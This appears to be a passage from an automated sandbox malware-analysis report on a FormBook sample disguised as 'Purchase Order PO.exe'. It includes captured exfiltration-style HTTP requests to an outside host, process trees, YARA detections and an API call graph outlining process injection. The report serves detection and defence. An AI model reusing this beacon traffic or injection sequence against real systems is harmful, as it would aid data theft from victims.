                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.450049146.88.233.115803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:56.102432966 CET656OUTPOST /qtfx/ HTTP/1.1
                                                                                                                          Host: www.smartcongress.net
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.smartcongress.net
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.smartcongress.net/qtfx/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 2f 37 67 7a 30 65 53 2f 79 6d 4b 53 2f 53 69 58 4e 53 69 63 36 42 31 4d 70 6f 53 4b 30 2b 79 31 74 48 31 71 2f 6d 53 49 6e 4a 4a 74 51 6a 69 43 54 48 36 61 71 73 71 4f 43 72 6c 56 57 70 39 42 77 70 52 6a 79 66 53 73 64 45 36 51 53 44 75 69 57 55 39 68 4f 57 35 70 66 39 68 75 69 32 74 48 32 45 65 6c 6a 70 42 74 70 44 58 53 39 4d 58 71 5a 76 32 67 74 4b 6c 43 76 6e 54 48 57 45 39 72 62 70 79 52 62 31 33 34 5a 54 2b 2f 61 33 34 6e 4f 4b 74 4f 6a 34 52 70 62 4d 64 58 53 30 53 5a 4f 55 45 58 48 52 54 39 6c 63 52 6e 65 69 54 4c 61 6f 6b 33 68 44 73 6e 69 32 2f 73 63 2f 5a 5a 33 6a 6c 70 39 61 76 6d 38 47 4d 3d
                                                                                                                          Data Ascii: Mr60=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+y1tH1q/mSInJJtQjiCTH6aqsqOCrlVWp9BwpRjyfSsdE6QSDuiWU9hOW5pf9hui2tH2EeljpBtpDXS9MXqZv2gtKlCvnTHWE9rbpyRb134ZT+/a34nOKtOj4RpbMdXS0SZOUEXHRT9lcRneiTLaok3hDsni2/sc/ZZ3jlp9avm8GM=
                                                                                                                          Nov 22, 2024 15:14:57.406168938 CET380INHTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html; charset=iso-8859-1
                                                                                                                          content-length: 196
                                                                                                                          date: Fri, 22 Nov 2024 14:14:57 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          x-tuned-by: N0C
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.2.450050146.88.233.115803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:58.773452997 CET10738OUTPOST /qtfx/ HTTP/1.1
                                                                                                                          Host: www.smartcongress.net
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.smartcongress.net
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.smartcongress.net/qtfx/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 2f 37 67 7a 30 65 53 2f 79 6d 4b 53 2f 53 69 58 4e 53 69 63 36 42 31 4d 70 6f 53 4b 30 2b 71 31 74 31 39 71 38 46 36 49 6d 4a 4a 74 61 44 69 50 54 48 36 39 71 73 79 53 43 72 70 6a 57 71 46 42 32 37 70 6a 36 4f 53 73 49 55 36 51 4f 7a 76 46 4a 45 39 77 4f 58 56 6c 66 39 78 75 69 32 74 48 32 48 57 6c 79 39 56 74 72 44 58 52 72 63 58 63 64 76 33 2f 74 4b 74 53 76 6e 57 77 56 30 64 72 62 4e 57 52 64 48 76 34 62 7a 2b 39 62 33 34 76 4f 4b 68 64 6a 34 39 6c 62 4e 6f 36 53 79 75 5a 4d 77 4a 6a 51 31 6e 61 36 66 31 31 4c 56 6e 61 62 76 41 6e 6c 6a 41 4d 71 55 50 35 4d 4c 4e 43 2f 45 4d 41 6c 61 37 6b 6f 77 35 36 48 61 67 47 66 62 63 46 4c 37 2b 42 78 69 63 5a 79 47 4b 30 2b 49 37 6d 7a 67 51 54 63 4e 71 47 56 69 6f 66 39 65 42 6b 42 4a 36 6a 50 73 56 73 68 6d 74 34 44 75 44 6e 54 43 48 43 35 4b 58 59 31 43 72 4e 53 32 47 66 6e 43 73 7a 6d 68 68 4b 49 4c 6d 42 79 55 48 4c 66 53 6d 37 46 34 75 50 52 69 2f 47 77 6c 55 4c 42 56 45 4b 55 76 4d 75 6c 4e 52 39 5a [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+q1t19q8F6ImJJtaDiPTH69qsySCrpjWqFB27pj6OSsIU6QOzvFJE9wOXVlf9xui2tH2HWly9VtrDXRrcXcdv3/tKtSvnWwV0drbNWRdHv4bz+9b34vOKhdj49lbNo6SyuZMwJjQ1na6f11LVnabvAnljAMqUP5MLNC/EMAla7kow56HagGfbcFL7+BxicZyGK0+I7mzgQTcNqGViof9eBkBJ6jPsVshmt4DuDnTCHC5KXY1CrNS2GfnCszmhhKILmByUHLfSm7F4uPRi/GwlULBVEKUvMulNR9ZsBRpMuQ949L83CiPfuc/xEEuyufGI9OXA+RzAr4V9xHcXmfBytrw01pEUGVGebKi4OEt3s7CX5oDROBS/hO/YuudQ1gQgJMNIhVGIjxdNYeu2j/mguQEsbHLlVmvCHgVTuhFsxFdUHcSfgktu7jBFA2cLih/bL8Y/PCP1lvUYBEkY9cfzxpi/My7A/vaj5OIHqoYqXgU7HIAH/si3fybzgBjXnKr4FLN2fLAlf6ZWqC8Jle5G/iDLoVp/zkpuzdZcv3YQjH2zl1ERNBC+ROvvRofyZbO+Sy8QmnKR+lx/zuwoY2nRW9oTrPKOKpPLp7ud1I52F/VqH4asqbhpkstZJMa2MVZFrafyame5i0oebawRk/57SDjMS8STCVhXWxzgxXgbQ6wqX82693J9hD4UzPMIdnW9/Hawj61zbfHSx96ZZyywRx8Jth5xCoZZs3MrjsYsX/5l8Gf7W/2q2Sq88Tx2GBmCWxhTTWe5se0pvZSOSfzvA+yOXBDILraeDVBvm/dOmsU5UzEIUAdDMlNUXwSsu0Se+XAksjgYunGXwCy7iEDBZlsICDTvL6PkVvaTDQl24pVsLWdUWYrZvduoQhFvD24Oa6zEPeOfQ8n7uM7TYBjXFaq9xj61IAuid6p2M9p9lCPkpWrx3GkKMBCIjjpy2hEcsfZNt [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:15:00.164673090 CET380INHTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html; charset=iso-8859-1
                                                                                                                          content-length: 196
                                                                                                                          date: Fri, 22 Nov 2024 14:14:59 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          x-tuned-by: N0C
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.2.450051146.88.233.115803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:15:01.441237926 CET360OUTGET /qtfx/?Mr60=KdNk/QG/ntQJ0Ylt7Lyc3znBwC3jfRDsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLMlSLf1n7d0xHEmolRusqu1Y7m0apztprjxI=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.smartcongress.net
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:15:02.766300917 CET380INHTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html; charset=iso-8859-1
                                                                                                                          content-length: 196
                                                                                                                          date: Fri, 22 Nov 2024 14:15:02 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          x-tuned-by: N0C
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:09:10:59
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\Purchase Order PO.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order PO.exe"
                                                                                                                          Imagebase:0x710000
                                                                                                                          File size:770'560 bytes
                                                                                                                          MD5 hash:28D64B4CC91C016C93EB28E1F465EFD2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:09:11:04
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\Purchase Order PO.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order PO.exe"
                                                                                                                          Imagebase:0xf60000
                                                                                                                          File size:770'560 bytes
                                                                                                                          MD5 hash:28D64B4CC91C016C93EB28E1F465EFD2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:6
                                                                                                                          Start time:09:11:36
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe"
                                                                                                                          Imagebase:0x600000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:7
                                                                                                                          Start time:09:11:37
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                                                                                          Imagebase:0x9c0000
                                                                                                                          File size:107'008 bytes
                                                                                                                          MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:8
                                                                                                                          Start time:09:11:51
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe"
                                                                                                                          Imagebase:0x600000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:9
                                                                                                                          Start time:09:12:04
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                          Imagebase:0x7ff6bf500000
                                                                                                                          File size:676'768 bytes
                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:11.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:2.1%
                                                                                                                            Total number of Nodes:190
                                                                                                                            Total number of Limit Nodes:13
                                                                                                                            execution_graph 33021 114d620 DuplicateHandle 33022 114d6b6 33021->33022 32876 7469100 32877 746928b 32876->32877 32879 7469126 32876->32879 32879->32877 32880 7463de8 32879->32880 32881 7469380 PostMessageW 32880->32881 32882 74693ec 32881->32882 32882->32879 32897 74675e0 32898 7467506 32897->32898 32899 74674eb 32898->32899 32902 7467ec0 32898->32902 32915 7467eb0 32898->32915 32904 7467eda 32902->32904 32903 7467efe 32903->32899 32904->32903 32928 74684ce 32904->32928 32932 74684a1 32904->32932 32937 74683c0 32904->32937 32942 7468433 32904->32942 32947 7468514 32904->32947 32952 7468487 32904->32952 32960 7468826 32904->32960 32967 74687e6 32904->32967 32972 7468528 32904->32972 32976 746859f 32904->32976 32916 7467ec0 32915->32916 32917 7467efe 32916->32917 32918 74687e6 2 API calls 32916->32918 32919 7468826 4 API calls 32916->32919 32920 7468487 4 API calls 32916->32920 32921 7468514 2 API calls 32916->32921 32922 7468433 2 API calls 32916->32922 32923 74683c0 2 API calls 32916->32923 32924 74684a1 2 API calls 32916->32924 32925 74684ce 2 API calls 32916->32925 32926 746859f 2 API calls 32916->32926 32927 7468528 2 API calls 32916->32927 32917->32899 32918->32917 32919->32917 32920->32917 32921->32917 32922->32917 32923->32917 32924->32917 32925->32917 32926->32917 32927->32917 32981 7466d90 32928->32981 32985 7466d88 32928->32985 32929 74684ec 32934 74684a7 32932->32934 32933 7468b6b 32933->32903 32934->32903 32934->32933 32989 74667d0 32934->32989 32993 74667c8 32934->32993 32938 74683da 32937->32938 32997 7466f40 32938->32997 33001 7466f38 32938->33001 32939 74682eb 32939->32903 32943 7468439 32942->32943 32945 7466f40 ReadProcessMemory 32943->32945 32946 7466f38 ReadProcessMemory 32943->32946 32944 74682eb 32944->32903 32945->32944 32946->32944 32948 7468521 32947->32948 32948->32903 32949 7468b6b 32948->32949 32950 74667d0 ResumeThread 32948->32950 32951 74667c8 ResumeThread 32948->32951 32949->32903 32950->32948 32951->32948 32953 746848d 32952->32953 32954 74683bf 32953->32954 33005 7466cb1 32953->33005 33009 7466cb8 32953->33009 32958 7466f40 ReadProcessMemory 32954->32958 32959 7466f38 ReadProcessMemory 32954->32959 32955 74682eb 32955->32903 32958->32955 32959->32955 32963 7466cb1 Wow64SetThreadContext 32960->32963 32964 7466cb8 Wow64SetThreadContext 32960->32964 32961 74684b8 32961->32903 32962 7468b6b 32961->32962 32965 74667d0 ResumeThread 32961->32965 32966 74667c8 ResumeThread 32961->32966 32962->32903 32963->32961 32964->32961 32965->32961 32966->32961 32968 74687fb 32967->32968 33013 7466e50 32968->33013 33017 7466e48 32968->33017 32969 74688e2 32974 7466e50 WriteProcessMemory 32972->32974 32975 7466e48 WriteProcessMemory 32972->32975 32973 7468556 32973->32903 32974->32973 32975->32973 32977 7468965 32976->32977 32979 7466e50 WriteProcessMemory 32977->32979 32980 7466e48 WriteProcessMemory 32977->32980 32978 74682eb 32978->32903 32979->32978 32980->32978 32982 7466dd0 VirtualAllocEx 32981->32982 32984 7466e0d 32982->32984 32984->32929 32986 7466d90 VirtualAllocEx 32985->32986 32988 7466e0d 32986->32988 32988->32929 32990 7466810 ResumeThread 32989->32990 32992 7466841 32990->32992 32992->32934 32994 7466810 ResumeThread 32993->32994 32996 7466841 32994->32996 32996->32934 32998 7466f8b ReadProcessMemory 32997->32998 33000 7466fcf 32998->33000 33000->32939 33002 7466f40 ReadProcessMemory 33001->33002 33004 7466fcf 33002->33004 33004->32939 33006 7466c77 33005->33006 33006->33005 33007 7466d1d Wow64SetThreadContext 33006->33007 33008 7466d45 33007->33008 33008->32954 33010 7466cfd Wow64SetThreadContext 33009->33010 33012 7466d45 33010->33012 33012->32954 33014 7466e98 WriteProcessMemory 33013->33014 33016 7466eef 33014->33016 33016->32969 33018 7466e50 WriteProcessMemory 33017->33018 33020 7466eef 33018->33020 33020->32969 32883 114d3d8 32884 114d41e GetCurrentProcess 32883->32884 32886 114d470 GetCurrentThread 32884->32886 32888 114d469 32884->32888 32887 114d4ad GetCurrentProcess 32886->32887 32889 114d4a6 32886->32889 32892 114d4e3 32887->32892 32888->32886 32889->32887 32890 114d50b GetCurrentThreadId 32891 114d53c 32890->32891 32892->32890 33023 1144668 33024 1144684 33023->33024 33025 11446b2 33024->33025 33029 1144908 33024->33029 33034 11444b0 33025->33034 33027 11446d1 33030 114492d 33029->33030 33038 1144a18 33030->33038 33042 1144a08 33030->33042 33031 1144937 33031->33025 33035 11444bb 33034->33035 33050 1145c04 33035->33050 33037 1147180 33037->33027 33040 1144a3f 33038->33040 33039 1144b1c 33039->33039 33040->33039 33046 1144618 33040->33046 33044 1144a12 33042->33044 33043 11449ce 33043->33031 33043->33043 33044->33043 33045 1144618 CreateActCtxA 33044->33045 33045->33043 33047 1145ea8 CreateActCtxA 33046->33047 33049 1145f6b 33047->33049 33049->33049 33051 1145c0f 33050->33051 33054 1145c24 33051->33054 33053 1147225 33053->33037 33055 1145c2f 33054->33055 33058 1145c54 33055->33058 33057 1147302 33057->33053 33059 1145c5f 33058->33059 33062 1145c84 33059->33062 33061 1147405 33061->33057 33063 1145c8f 33062->33063 33065 114896b 33063->33065 33070 114b020 33063->33070 33074 114ad18 33063->33074 33078 114ad28 33063->33078 33064 11489a9 33064->33061 33065->33064 33082 114d100 33065->33082 33087 114b058 33070->33087 33090 114b048 33070->33090 33071 114b036 33071->33065 33075 114ad28 33074->33075 33077 114ad5b 33075->33077 33099 1148684 GetModuleHandleW 33075->33099 33077->33065 33079 114ad43 33078->33079 33081 114ad5b 33079->33081 33100 1148684 GetModuleHandleW 33079->33100 33081->33065 33084 114d131 33082->33084 33083 114d155 33083->33064 33084->33083 33101 114d2c0 33084->33101 33105 114d2af 33084->33105 33094 114b150 33087->33094 33088 114b067 33088->33071 33091 114b058 33090->33091 33093 114b150 GetModuleHandleW 33091->33093 33092 114b067 33092->33071 33093->33092 33095 114b184 33094->33095 33096 114b161 33094->33096 33095->33088 33096->33095 33097 114b388 GetModuleHandleW 33096->33097 33098 114b3b5 33097->33098 33098->33088 33099->33077 33100->33081 33102 114d2cd 33101->33102 33103 114d307 33102->33103 33109 114cbf8 33102->33109 33103->33083 33106 114d2cd 33105->33106 33107 114cbf8 GetModuleHandleW 33106->33107 33108 114d307 33106->33108 33107->33108 33108->33083 33110 114cbfd 33109->33110 33112 114dc18 33110->33112 33113 114cd24 33110->33113 33112->33112 33114 114cd2f 33113->33114 33115 1145c84 GetModuleHandleW 33114->33115 33116 114dc87 33115->33116 33119 114cd34 33116->33119 33118 114dcb0 33118->33112 33122 114cd3f 33119->33122 33120 114df74 GetModuleHandleW 33121 114f224 33120->33121 33121->33118 33122->33120 33123 114f229 33122->33123 33123->33118 32893 74670d8 32894 7467161 CreateProcessA 32893->32894 32896 7467323 32894->32896 32896->32896
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq$Hbq
                                                                                                                            • API String ID: 0-56095411
                                                                                                                            • Opcode ID: fd3df31d9ba2f9b2712b510627b3b798a3cfcb762e54e36442a498854f2daf34
                                                                                                                            • Instruction ID: 8981435e177cdc5017f362bd55becceb8cb753912e71f2873f3e4dd965db3832
                                                                                                                            • Opcode Fuzzy Hash: fd3df31d9ba2f9b2712b510627b3b798a3cfcb762e54e36442a498854f2daf34
                                                                                                                            • Instruction Fuzzy Hash: 28725E70A042199FCB14DF69E894AAEBBF6FF88300F15856AE546EB391DB30DD41CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                            • API String ID: 0-183542557
                                                                                                                            • Opcode ID: 892473618b9bab9ee02a91ceb0c977851f471df426a54274d3f1dee2ab664b08
                                                                                                                            • Instruction ID: 5d88c04af5dbe5c78c4af69c44d05fc265316fa41bb97f6c5b57bb578a644c24
                                                                                                                            • Opcode Fuzzy Hash: 892473618b9bab9ee02a91ceb0c977851f471df426a54274d3f1dee2ab664b08
                                                                                                                            • Instruction Fuzzy Hash: 89A28170A04209DFCB15CF68C894AAEBBF6FF88304F168566E546DB365DB30E981CB51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
